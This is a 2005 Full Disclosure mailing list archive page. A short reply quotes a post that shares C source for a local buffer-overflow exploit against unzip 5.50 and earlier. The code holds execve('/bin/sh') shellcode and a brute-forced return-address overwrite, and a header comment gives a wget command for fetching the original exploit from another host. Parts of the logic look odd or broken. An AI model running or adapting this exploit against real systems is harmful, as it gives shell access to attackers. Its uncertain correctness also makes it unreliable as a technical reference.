Full Disclosure mailing list archives
Re: Unzip *ALL* verisons ;))
From: "GroundZero Security" <fd () g-0 org>
Date: Tue, 20 Dec 2005 00:19:46 +0100
LOL!

----- Original Message -----
From: "KF (lists)" <kf_lists () digitalmunition com>
To: <full-disclosure () lists grok org uk>
Sent: Monday, December 19, 2005 10:42 PM
Subject: Re: [Full-disclosure] Unzip *ALL* verisons ;))
I'm thinking this is a pretty old-school bug... this is damn old code, I believe. I know it's something I found while working at Snosoft, but I have no clue when.

/*
 * By DVDMAN (DVDMAN () L33TSECURITY COM)
 * dvdman () snosoft com
 * http://www.snosoft.com
 * http://WWW.L33TSECURITY.COM
 * L33T SECURITY Keep It Private
 *
 * based on code by hackbox.ath.cx
 *   > wget http://hackbox.ath.cx/mizc/unzip-expl.c
 *
 * lame unzip <= 5.50 tested on redhat 7.2
 * By DVDMAN L33TSECURITY.COM
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen */

#define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
#define BUF 3264+1900+20000
#define LOC 3262
#define OFFSET 700 // brute force it

char fakechunk[] =
    "\xf0\xff\xff\xff"
    "\xfc\xff\xff\xff"
    "\xde\x16\xe8\x77"
    "\x42\x6c\xe8\x77";

char execshell[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89"
    "\xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40"
    "\xcd\x80"; /* newroot's shellcode */

int main (int argc, char *argv[])
{
    char buf[BUF + 1];
    int x;
    char *ptr;
    int i=0,offset=OFFSET;
    unsigned long addy = 0xbffffab0;

    if (argc < 2) {
        printf("[L33TSECURITY]");
        printf("UNZIP EXPLOIT BY DVDMAN ");
        printf("[L33TSECURITY]\n");
        printf("[Usage] %s Offset\n",argv[0]);
        return 0;
    }
    if (argc > 1)
        offset = atoi(argv[1]);

    memset(buf,0x90,BUF);
    ptr = buf + ((BUF) - strlen(execshell));
    for (i=0;i<strlen(execshell);i++)
        *(ptr++) = execshell[i];

    *(long*)&buf[LOC] = addy + offset;
    *(long*)&buf[LOC+4] = addy + offset;
    buf[BUF] = 0;

    if (buf < MAX) {
        x = atoi(fakechunk + 2);
        memset(buf,x,BUF);
        execl("/usr/bin/unzip","unzip",buf,NULL);
    }
    execl("/usr/bin/unzip","unzip",buf,fakechunk,NULL);
    return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/